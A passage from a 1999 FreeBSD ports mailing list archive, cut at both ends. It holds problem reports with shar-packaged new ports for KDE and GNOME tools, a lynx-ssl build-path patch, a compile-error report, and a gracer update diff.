new EditWidget (kapp, Editors, i18n ("Untiled")); X+ newFile = new EditWidget (kapp, Editors, (char *)i18n ("Untiled")); X Editors->insertPage (newFile, "Untiled"); X Editors->setVisiblePage(newFile); X newFile->setFocusPolicy(StrongFocus); END-of-kdreamsite/patches/patch-ac echo x - kdreamsite/Makefile sed 's/^X//' >kdreamsite/Makefile << 'END-of-kdreamsite/Makefile' X# New ports collection makefile for: KDreamSite X# Version required: 0.2 X# Date created: 12 Nov 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X# X XDISTNAME= kdreamsite-0.2 XCATEGORIES= www XMASTER_SITES= http://neptune.spaceports.com/%7Eatnet/files/ X XMAINTAINER= andrews@technologist.com X XLIB_DEPENDS= kdeui.2:${PORTSDIR}/x11/kdelibs11/ X XGNU_CONFIGURE= yes XCONFIGURE_ARGS= --prefix=${LOCALBASE} XUSE_NEWGCC= yes XUSE_GMAKE= yes X X.include END-of-kdreamsite/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 1:40: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 319C3155C2 for ; Sun, 28 Nov 1999 01:40:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA55850; Sun, 28 Nov 1999 01:40:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pluto.psn.net (pluto.psn.net [207.211.58.12]) by hub.freebsd.org (Postfix) with ESMTP id 4791714DAC for ; Sun, 28 Nov 1999 01:31:50 -0800 (PST) (envelope-from will@shadow.blackdawn.com) Received: from 5042-243.008.popsite.net ([209.224.140.243] helo=shadow.blackdawn.com) by pluto.psn.net with esmtp (PSN Internet Service 3.03 #1) for FreeBSD-gnats-submit@FreeBSD.ORG id 11s0gO-0003TT-00; Sun, 28 Nov 1999 02:31:49 -0700 Received: (from will@localhost) by shadow.blackdawn.com (8.9.3/8.9.3) id EAA21904; Sun, 28 Nov 1999 04:31:45 -0500 (EST) (envelope-from will) Message-Id: <199911280931.EAA21904@shadow.blackdawn.com> Date: Sun, 28 Nov 1999 04:31:45 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15135: new port: devel/cervisia Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15135 >Category: ports >Synopsis: new port: devel/cervisia >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 01:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #2: Tue Nov 16 05:42:45 EST 1999 will@:/usr/src/sys/compile/ARGON i386 >Description: Cervisia is a simple CVS development tool made to work with KDE. Only of interest to those of you who prefer to use a GUI tool to interface with CVS... >How-To-Repeat: Use the shar below to import the new port to the tree. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # cervisia # cervisia/Makefile # cervisia/files # cervisia/files/md5 # cervisia/pkg # cervisia/pkg/PLIST # cervisia/pkg/DESCR # cervisia/pkg/COMMENT # cervisia/patches # echo c - cervisia mkdir -p cervisia > /dev/null 2>&1 echo x - cervisia/Makefile sed 's/^X//' >cervisia/Makefile << 'END-of-cervisia/Makefile' X# New ports collection Makefile for: cervisia X# Version required: 0.2.1 X# Date created: 17 Nov 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X XDISTNAME= cervisia-0.2.1 XCATEGORIES= devel XMASTER_SITES= ftp://ftp.kde.org/pub/kde/unstable/apps/utils/ X XMAINTAINER= andrews@technologist.com X XRUN_DEPENDS= kwm:${PORTSDIR}/x11/kdebase11 X XUSE_X_PREFIX= yes XGNU_CONFIGURE= yes XCONFIGURE_ARGS= --prefix=${LOCALBASE} \ X --with-extra-includes="${LOCALBASE}/include" \ X --with-extra-libraries="${LOCALBASE}/lib" XCONFIGURE_ENV= prefix="${LOCALBASE}" KDEDIR="${LOCALBASE}" X XMAN1= cervisia.1 X X.include END-of-cervisia/Makefile echo c - cervisia/files mkdir -p cervisia/files > /dev/null 2>&1 echo x - cervisia/files/md5 sed 's/^X//' >cervisia/files/md5 << 'END-of-cervisia/files/md5' XMD5 (cervisia-0.2.1.tar.gz) = b4c013e980703dd50fbbe270d8ebb075 END-of-cervisia/files/md5 echo c - cervisia/pkg mkdir -p cervisia/pkg > /dev/null 2>&1 echo x - cervisia/pkg/PLIST sed 's/^X//' >cervisia/pkg/PLIST << 'END-of-cervisia/pkg/PLIST' Xbin/cervisia Xshare/applnk/Development/Cervisia.kdelnk Xshare/doc/HTML/en/cervisia/index.html Xshare/doc/HTML/en/cervisia/index-1.html Xshare/doc/HTML/en/cervisia/index-2.html Xshare/doc/HTML/en/cervisia/index-3.html X@dirrm share/doc/HTML/en/cervisia END-of-cervisia/pkg/PLIST echo x - cervisia/pkg/DESCR sed 's/^X//' >cervisia/pkg/DESCR << 'END-of-cervisia/pkg/DESCR' XCervisia is a rather simplistic KDE-based CVS development Xtool. More to come. X XWWW: http://pauli.uni-muenster.de/~gehrmab/cervisia.html END-of-cervisia/pkg/DESCR echo x - cervisia/pkg/COMMENT sed 's/^X//' >cervisia/pkg/COMMENT << 'END-of-cervisia/pkg/COMMENT' XGUI utility to assist with CVS-based development. END-of-cervisia/pkg/COMMENT echo c - cervisia/patches mkdir -p cervisia/patches > /dev/null 2>&1 exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 1:50: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1019F15597 for ; Sun, 28 Nov 1999 01:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA56242; Sun, 28 Nov 1999 01:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 28 Nov 1999 01:50:01 -0800 (PST) Message-Id: <199911280950.BAA56242@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Will Andrews Subject: RE: ports/15131: new port: devel/kpp Reply-To: Will Andrews Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15131; it has been noted by GNATS. From: Will Andrews To: Will Andrews Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: RE: ports/15131: new port: devel/kpp Date: Sun, 28 Nov 1999 04:43:43 -0500 (EST) On 28-Nov-99 Will Andrews wrote: > XMASTER_SITES= http This is: http://www.msoe.edu/~geiseri/phpinclude/download.php3?download=Kpp I haven't found any other way to get the file.. -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 4:48:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from merkur.hrz.uni-giessen.de (merkur.hrz.uni-giessen.de [134.176.2.12]) by hub.freebsd.org (Postfix) with ESMTP id 37B4914F9E for ; Sun, 28 Nov 1999 04:48:09 -0800 (PST) (envelope-from Ariel.Burbaickij@mni.fh-giessen.de) Received: from caspar.mni.fh-giessen.de by merkur.hrz.uni-giessen.de with ESMTP for freebsd-ports@freebsd.org; Sun, 28 Nov 1999 13:48:20 +0100 Received: from sun33.mni.fh-giessen.de ([134.176.183.133]) by caspar.mni.fh-giessen.de with esmtp (Exim 2.12 #6) id 11s3a7-0003Wv-00 for freebsd-ports@FreeBSD.org; Sun, 28 Nov 1999 13:37:31 +0100 Received: from localhost (hg9456@localhost) by sun33.mni.fh-giessen.de (8.9.3+Sun/8.8.8) with ESMTP id NAA29872 for ; Sun, 28 Nov 1999 13:48:11 +0100 (MET) X-Authentication-Warning: sun33.mni.fh-giessen.de: hg9456 owned process doing -bs Date: Sun, 28 Nov 1999 13:48:10 +0100 (MET) From: Ariel Burbaickij X-Sender: hg9456@sun33 To: freebsd-ports@FreeBSD.ORG Subject: policies accepted in the list and questions you deal with Message-Id: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hallo, I am new to this list would like to get some information about DO and DONTS here as well as about format you expect from any user experiencing some troubles with ported applications and wishing to send his reports to this list(in case they are accpted at all). kind regards, Ariel Burbaickij To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 4:50: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 31B5A15612 for ; Sun, 28 Nov 1999 04:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA66533; Sun, 28 Nov 1999 04:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 28 Nov 1999 04:50:02 -0800 (PST) Message-Id: <199911281250.EAA66533@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Chris D. Faulhaber" Subject: Re: ports/15132: new port: games/krubik Reply-To: "Chris D. Faulhaber" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15132; it has been noted by GNATS. From: "Chris D. Faulhaber" To: Will Andrews Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: ports/15132: new port: games/krubik Date: Sun, 28 Nov 1999 07:48:25 -0500 (EST) My krubik port that was committed Friday isn't good enough for you? :) ----- Chris D. Faulhaber | You can ISO9001 certify the process of System/Network Administrator, | shooting yourself in the foot, so long Reality Check Information, Inc. | as the process is documented and reliably | produces the proper result. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 5: 0: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D763215623 for ; Sun, 28 Nov 1999 05:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA66982; Sun, 28 Nov 1999 05:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 28 Nov 1999 05:00:02 -0800 (PST) Message-Id: <199911281300.FAA66982@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Chris D. Faulhaber" Subject: Re: ports/15135: new port: devel/cervisia Reply-To: "Chris D. Faulhaber" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15135; it has been noted by GNATS. From: "Chris D. Faulhaber" To: Will Andrews Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: ports/15135: new port: devel/cervisia Date: Sun, 28 Nov 1999 07:55:20 -0500 (EST) Under -stable: ===> Building for cervisia-0.2.1 make all-recursive Making all in src c++ -DHAVE_CONFIG_H -I. -I. -I.. -I/usr/local/include -I/usr/X11R6/include/X11/qt -I/usr/local/include -I/usr/X11R6/include -O1 -g -c main.cpp /usr/X11R6/bin/moc toplevel.h -o toplevel.moc c++ -DHAVE_CONFIG_H -I. -I. -I.. -I/usr/local/include -I/usr/X11R6/include/X11/qt -I/usr/local/include -I/usr/X11R6/include -O1 -g -c toplevel.cpp /usr/X11R6/include/X11/qt/qlist.h: In method `void QListT::deleteItem(void *)': In file included from logdlg.h:26, from toplevel.cpp:32: /usr/X11R6/include/X11/qt/qlist.h:177: invalid use of undefined type `struct LogTreeItem' /usr/X11R6/include/X11/qt/qlist.h: In method `void QListT::deleteItem(void *)': In file included from diffdlg.h:26, from toplevel.cpp:34: /usr/X11R6/include/X11/qt/qlist.h:177: invalid use of undefined type `struct DiffViewItem' /usr/X11R6/include/X11/qt/qlist.h: In method `void QListT::deleteItem(void *)': In file included from toplevel.cpp:35: /usr/X11R6/include/X11/qt/qlist.h:177: invalid use of undefined type `struct ResolveItem' /usr/X11R6/include/X11/qt/qlist.h: In method `void QListT::deleteItem(void *)': In file included from annotatedlg.h:23, from toplevel.cpp:36: /usr/X11R6/include/X11/qt/qlist.h:177: invalid use of undefined type `struct AnnotateViewItem' *** Error code 1 This is another KDE/C++ port that will require the new gcc; and since it is c++, the kde libs will need to be created with the new gcc also (which doesn't happen in anything but -current). Can we make ports like this -current-only? ----- Chris D. Faulhaber | You can ISO9001 certify the process of System/Network Administrator, | shooting yourself in the foot, so long Reality Check Information, Inc. | as the process is documented and reliably | produces the proper result. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 5:30: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8715A14F82 for ; Sun, 28 Nov 1999 05:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA68237; Sun, 28 Nov 1999 05:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (Postfix) with ESMTP id CA28114D0E for ; Sun, 28 Nov 1999 05:22:39 -0800 (PST) (envelope-from matt@megaweapon.zigg.com) Received: (from matt@localhost) by megaweapon.zigg.com (8.9.3/8.9.3) id IAA21146; Sun, 28 Nov 1999 08:21:07 -0500 (EST) (envelope-from matt) Message-Id: <199911281321.IAA21146@megaweapon.zigg.com> Date: Sun, 28 Nov 1999 08:21:07 -0500 (EST) From: matt@zigg.com Reply-To: matt@zigg.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15137: [PATCH] www/lynx-ssl can't find OpenSSL if installed w/ PREFIX Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15137 >Category: ports >Synopsis: [PATCH] www/lynx-ssl can't find OpenSSL if installed w/ PREFIX >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 05:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Matt Behrens >Release: FreeBSD 3.3-STABLE i386 >Organization: zigg.com >Environment: FreeBSD megaweapon.zigg.com 3.3-STABLE FreeBSD 3.3-STABLE #3: Sat Nov 27 15:38:05 EST 1999 matt@megaweapon.zigg.com:/usr/src/sys/compile/MEGAWEAPON i386 >Description: The www/lynx-ssl port cannot find OpenSSL includes, which it depends on, if OpenSSL is installed using an alternative PREFIX. This will cause the build to fail. The reason this happens is because patch-aa substitutes /usr/local as the SSL_DIR instead of /usr/local/ssl. >How-To-Repeat: # cd /usr/ports/security/openssl # make PREFIX=/foo/bar install # cd /usr/ports/www/lynx-ssl # make PREFIX=/foo/bar install (build will fail on missing includes) >Fix: Tested patch follows. --- patches/patch-aa.broken Sun Nov 28 08:09:34 1999 +++ patches/patch-aa Sun Nov 28 08:10:07 1999 @@ -15,7 +15,7 @@ # ability to make SSL connections. -SSL_DIR= /usr/local/ssl -SSL_LIBS= -L$(SSL_DIR)/lib -lssl -lcrypto -+SSL_DIR= /usr/local ++SSL_DIR= $(prefix) +SSL_LIBS= -L$(SSL_DIR)/lib -lssl -lcrypto ${EXTRA_SSL_LIBS} SSL_DEFINES= -I$(SSL_DIR)/include -DUSE_SSL >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 5:30: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BFCE11509C for ; Sun, 28 Nov 1999 05:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA68246; Sun, 28 Nov 1999 05:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id BB14D14D5C for ; Sun, 28 Nov 1999 05:25:02 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 714019B38; Sun, 28 Nov 1999 08:25:01 -0500 (EST) Message-Id: <19991128132501.714019B38@pawn.primelocation.net> Date: Sun, 28 Nov 1999 08:25:01 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15138: New port: deskutils/yank Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15138 >Category: ports >Synopsis: New port: deskutils/yank >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 05:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 3.3-STABLE i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 3.3-STABLE i386 >Description: New port: deskutils/yank Yank is a simple notekeeper and todo-list manager for GNOME. Features include: * note organization in a tree structure * 3 different types of notes * sortable todolist * drag & drop support >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # yank # yank/Makefile # yank/files # yank/files/md5 # yank/pkg # yank/pkg/PLIST # yank/pkg/COMMENT # yank/pkg/DESCR # echo c - yank mkdir -p yank > /dev/null 2>&1 echo x - yank/Makefile sed 's/^X//' >yank/Makefile << 'END-of-yank/Makefile' X# New ports collection makefile for: yank X# Version required: 0.0.2 X# Date created: 28 November 1999 X# Whom: Chris D. Faulhaber X# X# $FreeBSD$ X# X XDISTNAME= yank-0.0.2 XCATEGORIES= deskutils gnome XMASTER_SITES= http://home.ins.de/~m.hussmann/software/yank/ X XMAINTAINER= jedgar@fxp.org X XLIB_DEPENDS= gnome.3:${PORTSDIR}/x11/gnomelibs X XGLIB_CONFIG?= ${LOCALBASE}/bin/glib12-config XGTK_CONFIG?= ${X11BASE}/bin/gtk12-config X XUSE_BZIP2= yes XUSE_X_PREFIX= yes XUSE_GMAKE= yes XGNU_CONFIGURE= yes XCONFIGURE_ARGS= --with-x XCONFIGURE_ENV+= CFLAGS="-I${LOCALBASE}/include ${CFLAGS}" \ X GLIB_CONFIG="${GLIB_CONFIG}" \ X GTK_CONFIG="${GTK_CONFIG}" \ X LIBS="-L${LOCALBASE}/lib" X X.include END-of-yank/Makefile echo c - yank/files mkdir -p yank/files > /dev/null 2>&1 echo x - yank/files/md5 sed 's/^X//' >yank/files/md5 << 'END-of-yank/files/md5' XMD5 (yank-0.0.2.tar.bz2) = ddf47f26b21b4754dc2620097831e448 END-of-yank/files/md5 echo c - yank/pkg mkdir -p yank/pkg > /dev/null 2>&1 echo x - yank/pkg/PLIST sed 's/^X//' >yank/pkg/PLIST << 'END-of-yank/pkg/PLIST' Xbin/yank Xshare/gnome/apps/Applications/yank.desktop Xshare/pixmaps/yank.png END-of-yank/pkg/PLIST echo x - yank/pkg/COMMENT sed 's/^X//' >yank/pkg/COMMENT << 'END-of-yank/pkg/COMMENT' XYank is a simple notekeeper and todo-list manager for GNOME END-of-yank/pkg/COMMENT echo x - yank/pkg/DESCR sed 's/^X//' >yank/pkg/DESCR << 'END-of-yank/pkg/DESCR' XYank is a simple notekeeper and todo-list manager for GNOME. X XFeatures include: X X* note organization in a tree structure X* 3 different types of notes X* sortable todolist X* drag & drop support X XWWW: http://home.ins.de/~m.hussmann/software/yank/ X X- Chris D. Faulhaber Xjedgar@fxp.org END-of-yank/pkg/DESCR exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 5:40: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BAA1A14F82 for ; Sun, 28 Nov 1999 05:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA68812; Sun, 28 Nov 1999 05:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 28 Nov 1999 05:40:03 -0800 (PST) Message-Id: <199911281340.FAA68812@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Matt Behrens Subject: Re: ports/15137: [PATCH] www/lynx-ssl can't find O... Reply-To: Matt Behrens Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15137; it has been noted by GNATS. From: Matt Behrens To: freebsd-gnats-submit@freebsd.org, matt@zigg.com Cc: Subject: Re: ports/15137: [PATCH] www/lynx-ssl can't find O... Date: Sun, 28 Nov 1999 08:33:37 -0500 (EST) Just a clarification: In the ``Description'' I pointed out that patch-aa substitutes /usr/local for /usr/local/ssl. I neglected to point out that this is a step in the right direction, but the real reason it's wrong is because it assumes a PREFIX of /usr/local. Sorry for any confusion that might have caused. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 6:10:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 229F314E1A for ; Sun, 28 Nov 1999 06:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA70683; Sun, 28 Nov 1999 06:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from blaubaer.kn-bremen.de (blaubaer.kn-bremen.de [195.37.179.254]) by hub.freebsd.org (Postfix) with ESMTP id 3606A14D75 for ; Sun, 28 Nov 1999 06:00:29 -0800 (PST) (envelope-from nox@saturn.kn-bremen.de) Received: from saturn.kn-bremen.de (uucp@localhost) by blaubaer.kn-bremen.de (8.9.1/8.9.1) with UUCP id OAA30539 for FreeBSD-gnats-submit@freebsd.org; Sun, 28 Nov 1999 14:58:26 +0100 Received: (from nox@localhost) by saturn.kn-bremen.de (8.9.3/8.8.5) id OAA47790; Sun, 28 Nov 1999 14:55:20 +0100 (CET) Message-Id: <199911281355.OAA47790@saturn.kn-bremen.de> Date: Sun, 28 Nov 1999 14:55:20 +0100 (CET) From: Juergen Lock Reply-To: nox@jelal.kn-bremen.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15141: update games/gracer to 0.1.4 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15141 >Category: ports >Synopsis: update games/gracer to 0.1.4 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 06:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Juergen Lock >Release: FreeBSD 3.3-STABLE i386 >Organization: me? organized? >Environment: 3.3-STABLE i386, Mesa-3.0, giflib-4.1.0, jpeg-6b, png-1.0.3, tcl-8.2.2 >Description: Updated to 0.1.4, several new features including sound. (not tested as i don't have a sound card in this box but as it uses a library that's in ports i guess it should work) joystick support for linux is in there too but i'll leave that to someone who actually has a joystick on a BSD box... >How-To-Repeat: n/a >Fix: Changed files: Makefile files/md5 patches/patch-aa pkg/COMMENT pkg/DESCR pkg/PLIST New file: patches/patch-ab Index: Makefile =================================================================== RCS file: /home/cvs/cvs/ports/games/gracer/Makefile,v retrieving revision 1.2 diff -u -u -r1.2 Makefile --- Makefile 1999/09/29 20:36:07 1.2 +++ Makefile 1999/11/28 12:15:51 @@ -1,27 +1,32 @@ # New ports collection makefile for: gracer -# Version required: 0.1.0 +# Version required: 0.1.4 # Date created: Fri Jul 30 20:50:16 MET DST 1999 # Whom: nox@jelal.kn-bremen.de # # $FreeBSD: ports/games/gracer/Makefile,v 1.2 1999/09/29 20:36:07 dan Exp $ # -DISTNAME= gracer-0.1.0 +DISTNAME= gracer-0.1.4 CATEGORIES= games MASTER_SITES= http://arch.comp.kyutech.ac.jp/~matsu/my_products/gtk/race/ MAINTAINER= nox@jelal.kn-bremen.de +BUILD_DEPENDS= ${X11BASE}/lib/libsl.a:${PORTSDIR}/x11-toolkits/plib LIB_DEPENDS= MesaGL.14:${PORTSDIR}/graphics/Mesa3 \ gif.5:${PORTSDIR}/graphics/giflib \ jpeg.9:${PORTSDIR}/graphics/jpeg \ - tcl80.1:${PORTSDIR}/lang/tcl80 + png.3:${PORTSDIR}/graphics/png \ + tcl82.1:${PORTSDIR}/lang/tcl82 # doesn't work, program still looks for its files in /usr/local #USE_X_PREFIX= yes USE_AUTOCONF= yes CFLAGS+= -I${X11BASE}/include -I${LOCALBASE}/include -L${LOCALBASE}/lib -CONFIGURE_ENV+= "CPP=cc -E -I${LOCALBASE}/include" +CONFIGURE_ENV+= "CPP=${CC} -E -I${LOCALBASE}/include -I${LOCALBASE}/include/tcl8.2" USE_GMAKE= yes +# for plib (sound): +USE_NEWGCC= yes +CONFIGURE_ARGS+= --with-plib=${X11BASE} .include Index: files/md5 =================================================================== RCS file: /home/cvs/cvs/ports/games/gracer/files/md5,v retrieving revision 1.1.1.1 diff -u -u -r1.1.1.1 md5 --- md5 1999/09/28 02:57:19 1.1.1.1 +++ md5 1999/11/27 18:39:34 @@ -1 +1 @@ -MD5 (gracer-0.1.0.tar.gz) = b0850bc93488e0fcb4517a9bb1b41e0f +MD5 (gracer-0.1.4.tar.gz) = 22e1639a0e54f117cf8e6dde97753587 Index: patches/patch-aa =================================================================== RCS file: /home/cvs/cvs/ports/games/gracer/patches/patch-aa,v retrieving revision 1.1.1.1 diff -u -u -r1.1.1.1 patch-aa --- patch-aa 1999/09/28 02:57:19 1.1.1.1 +++ patch-aa 1999/11/28 12:30:00 @@ -1,50 +1,32 @@ Index: configure.in -@@ -209,8 +209,8 @@ +@@ -237,7 +237,7 @@ tcl_prefix=$with_tcl) for tcl_prefix in $tcl_prefix $exec_prefix /usr/local /usr NONE; do - if test -r $tcl_prefix/lib/tclConfig.sh; then -- AC_MSG_RESULT([use tclConfig.sh in $tcl_prefix/lib]) -+ if test -r $tcl_prefix/lib/tcl8.0/tclConfig.sh; then -+ AC_MSG_RESULT([use tclConfig.sh in $tcl_prefix/lib/tcl8.0]) ++ if test -r $tcl_prefix/lib/tcl8.2/tclConfig.sh; then break; fi done -@@ -219,29 +219,31 @@ +@@ -246,18 +246,18 @@ AC_MSG_ERROR([could't find tclConfig.sh]) fi -file=${tcl_prefix}/lib/tclConfig.sh -+file=${tcl_prefix}/lib/tcl8.0/tclConfig.sh ++file=${tcl_prefix}/lib/tcl8.2/tclConfig.sh if test ! -r ${file}; then AC_MSG_ERROR(tclConfig.sh doesn't exist) fi -AC_MSG_RESULT([use tclConfig.sh in $tcl_prefix/lib]) -+AC_MSG_RESULT([use tclConfig.sh in $tcl_prefix/lib/tcl8.0]) ++AC_MSG_RESULT([use tclConfig.sh in $tcl_prefix/lib/tcl8.2]) . $file --TCL_CFLAGS="-I$tcl_prefix/include" -+TCL_CFLAGS="-I$tcl_prefix/include/tcl8.0" - TCL_LDFLAGS="$TCL_LIB_SPEC $TCL_LIBS" + if test $TCL_MAJOR_VERSION -lt 8; then + AC_MSG_ERROR([tcl version 8.0 or higher is required.]) + fi + +-TCL_CFLAGS="-I$TCL_SRC_DIR" ++TCL_CFLAGS="-I$tcl_prefix/include/tcl8.2" + TCL_LDFLAGS="$TCL_LIB_SPEC" AC_SUBST(TCL_CFLAGS) AC_SUBST(TCL_LDFLAGS) - - ####################################################### Check Graphics library - -+x_suffix="$X_LIBS $X_PRE_LIBS -lX11 -lXi -lXext -lXmu $X_EXTRA_LIBS -lm" -+ - AC_SUBST(GIF_LIBS) - AC_CHECK_HEADER(gif_lib.h, - 